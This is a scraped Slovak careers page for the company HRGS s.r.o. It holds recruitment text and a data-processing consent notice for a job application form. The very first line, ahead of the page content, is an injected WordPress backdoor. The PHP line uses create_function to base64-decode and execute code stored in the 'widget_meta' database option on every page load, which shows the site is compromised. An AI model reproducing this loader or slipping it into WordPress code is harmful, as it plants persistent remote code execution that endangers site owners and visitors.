add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Kariéra

Kariéra

Hľadáme ľudí, ktorí hľadajú riešenia

Pracovať v kolektíve profesionálov a tímových hráčov vyžaduje byť aktívny a kreatívny, pričom základom našich služieb je spokojnosť klientov, dôveryhodnosť a spoľahlivosť, ako aj vysoká kvalita práce a neustále napredovanie.

Práve preto neustále hľadáme do tímu ľudí, ktorí hľadajú riešenia, majú dobrý vzťah k spolupracovníkom, so zachovaním fair-play postupov, majú záujem o vlastný rozvoj a poskytujú maximum pre klientov a partnerov HRGS s.r.o.. Našim zamestnancom umožňujeme profesijný rast a dávame príležitosť využiť svoj potenciál a k tomu patriace ohodnotenie.
Odoslaním údajov výslovne súhlasíte so spracovávaním Vami poskytnutých osobných údajov vo informačnom systéme spoločnosti HRGS s.r.o. pre účely výberového konania na zvolenú pracovnú pozíciu (a to aj výberového konania, ktoré sa uskutoční v budúcnosti) a v prípade úspešného prijatia do zamestnania pre pracovnoprávne účely. Doba platnosti tohto súhlasu je na dobu neurčitú. Takto poskytnutý súhlas ste oprávnený písomne kedykoľvek odvolať. Súčasne odoslaním údajov prehlasujete, že údaje o Vašej osobe, ktoré ste v tomto formulári poskytol/poskytla sú pravdivé.

Kontaktný formulár
Scroll to Top
Prejsť na panel nástrojov